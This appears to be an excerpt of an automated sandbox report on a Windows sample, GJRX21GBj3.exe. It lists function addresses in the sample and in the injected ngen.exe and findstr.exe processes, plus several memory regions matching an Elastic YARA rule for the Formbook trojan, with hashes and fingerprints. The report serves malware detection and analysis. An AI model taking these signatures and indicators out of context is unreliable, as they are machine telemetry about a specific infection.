            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585535A00_2_00007FF6585535A0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658582DB00_2_00007FF658582DB0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658586D800_2_00007FF658586D80
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585825800_2_00007FF658582580
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658567DC00_2_00007FF658567DC0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658557EA00_2_00007FF658557EA0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585696600_2_00007FF658569660
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65856FE700_2_00007FF65856FE70
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585846E00_2_00007FF6585846E0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585EC8800_2_00007FF6585EC880
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585768600_2_00007FF658576860
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585850600_2_00007FF658585060
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF65857B8500_2_00007FF65857B850
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585719300_2_00007FF658571930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004017BF4_2_004017BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004028204_2_00402820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004048A44_2_004048A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0042D9C34_2_0042D9C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0041019A4_2_0041019A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004101A34_2_004101A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004012304_2_00401230
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004032804_2_00403280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00416A834_2_00416A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004103C34_2_004103C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0040E4434_2_0040E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_00401C704_2_00401C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004024FC4_2_004024FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_004025004_2_00402500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059505914_2_05950591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592D5B04_2_0592D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058905354_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059475714_2_05947571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593E4F64_2_0593E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594F43F4_2_0594F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059424464_2_05942446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058814604_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594F7B04_2_0594F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588C7C04_2_0588C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B47504_2_058B4750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058907704_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059416CC4_2_059416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AC6E04_2_058AC6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589B1B04_2_0589B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059501AA4_2_059501AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059481CC4_2_059481CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058801004_2_05880100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592A1184_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C516C4_2_058C516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F1724_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595B16B4_2_0595B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C04_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F0CC4_2_0593F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594F0E04_2_0594F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059470E94_2_059470E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D739A4_2_058D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059503E64_2_059503E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E3F04_2_0589E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594132D4_2_0594132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594A3524_2_0594A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587D34C4_2_0587D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058952A04_2_058952A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AB2C04_2_058AB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059312ED4_2_059312ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059302744_2_05930274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A8DBF4_2_058A8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AFDC04_2_058AFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588ADE04_2_0588ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589AD004_2_0589AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05893D404_2_05893D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05941D5A4_2_05941D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05947D734_2_05947D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05930CB54_2_05930CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594FCF24_2_0594FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05880CF24_2_05880CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890C004_2_05890C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05909C324_2_05909C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891F924_2_05891F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594FFB14_2_0594FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882FC84_2_05882FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589CFE04_2_0589CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594FF094_2_0594FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D2F284_2_058D2F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B0F304_2_058B0F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05904F404_2_05904F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594CE934_2_0594CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A2E904_2_058A2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05899EB04_2_05899EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594EEDB4_2_0594EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594EE264_2_0594EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890E594_2_05890E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058929A04_2_058929A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595A9A64_2_0595A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058999504_2_05899950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AB9504_2_058AB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A69624_2_058A6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058768B84_2_058768B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058938E04_2_058938E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE8F04_2_058BE8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD8004_2_058FD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058928404_2_05892840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589A8404_2_0589A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AFB804_2_058AFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05946BD74_2_05946BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058CDBF94_2_058CDBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594AB404_2_0594AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594FB764_2_0594FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588EA804_2_0588EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D5AA04_2_058D5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592DAAC4_2_0592DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593DAC64_2_0593DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05947A464_2_05947A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594FA494_2_0594FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05903A6C4_2_05903A6C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374A3527_2_0374A352
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0367D34C7_2_0367D34C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374132D7_2_0374132D
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037503E67_2_037503E6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0369E3F07_2_0369E3F0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036D739A7_2_036D739A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037302747_2_03730274
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037312ED7_2_037312ED
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036AB2C07_2_036AB2C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036952A07_2_036952A0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036C516C7_2_036C516C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0367F1727_2_0367F172
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0375B16B7_2_0375B16B
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036801007_2_03680100
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0372A1187_2_0372A118
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037481CC7_2_037481CC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0369B1B07_2_0369B1B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037501AA7_2_037501AA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374F0E07_2_0374F0E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037470E97_2_037470E9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036970C07_2_036970C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0373F0CC7_2_0373F0CC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036907707_2_03690770
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036B47507_2_036B4750
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0368C7C07_2_0368C7C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374F7B07_2_0374F7B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036AC6E07_2_036AC6E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037416CC7_2_037416CC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037475717_2_03747571
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036905357_2_03690535
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0372D5B07_2_0372D5B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037505917_2_03750591
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036814607_2_03681460
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_037424467_2_03742446
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374F43F7_2_0374F43F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0373E4F67_2_0373E4F6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374FB767_2_0374FB76
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374AB407_2_0374AB40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036CDBF97_2_036CDBF9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03746BD77_2_03746BD7
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036AFB807_2_036AFB80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03703A6C7_2_03703A6C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03747A467_2_03747A46
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374FA497_2_0374FA49
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0373DAC67_2_0373DAC6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036D5AA07_2_036D5AA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0372DAAC7_2_0372DAAC
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0368EA807_2_0368EA80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036A69627_2_036A6962
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036999507_2_03699950
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036AB9507_2_036AB950
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036929A07_2_036929A0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0375A9A67_2_0375A9A6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036928407_2_03692840
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0369A8407_2_0369A840
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036938E07_2_036938E0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036BE8F07_2_036BE8F0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036768B87_2_036768B8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03704F407_2_03704F40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036B0F307_2_036B0F30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374FF097_2_0374FF09
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0369CFE07_2_0369CFE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03682FC87_2_03682FC8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374FFB17_2_0374FFB1
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03691F927_2_03691F92
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03690E597_2_03690E59
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374EE267_2_0374EE26
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374EEDB7_2_0374EEDB
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03699EB07_2_03699EB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374CE937_2_0374CE93
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036A2E907_2_036A2E90
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03747D737_2_03747D73
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03693D407_2_03693D40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03741D5A7_2_03741D5A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0369AD007_2_0369AD00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0368ADE07_2_0368ADE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036AFDC07_2_036AFDC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_036A8DBF7_2_036A8DBF
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03709C327_2_03709C32
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03690C007_2_03690C00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0374FCF27_2_0374FCF2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03680CF27_2_03680CF2
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_03730CB57_2_03730CB5
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E51A607_2_02E51A60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E413A17_2_02E413A1
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E6A4C07_2_02E6A4C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E535807_2_02E53580
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E4CEC07_2_02E4CEC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E4AF407_2_02E4AF40
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E4CCA07_2_02E4CCA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E4CC977_2_02E4CC97
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0349A39A7_2_0349A39A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0349C06C7_2_0349C06C
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0349B0D87_2_0349B0D8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0349BBB47_2_0349BBB4
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_0349BCD37_2_0349BCD3
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: String function: 00007FF65855D7A0 appears 64 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 036C5130 appears 36 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 0367B970 appears 266 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 036FEA12 appears 84 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 0370F290 appears 105 times
            Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 036D7E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 0587B970 appears 268 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 058D7E54 appears 89 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 058C5130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 0590F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 058FEA12 appears 85 times
            Source: GJRX21GBj3.exeBinary or memory string: OriginalFilename vs GJRX21GBj3.exe
            Source: GJRX21GBj3.exe, 00000000.00000000.2067604251.00007FF658727000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
            Source: GJRX21GBj3.exe, 00000000.00000002.2078597874.0000029B99C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
            Source: GJRX21GBj3.exeBinary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
            Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
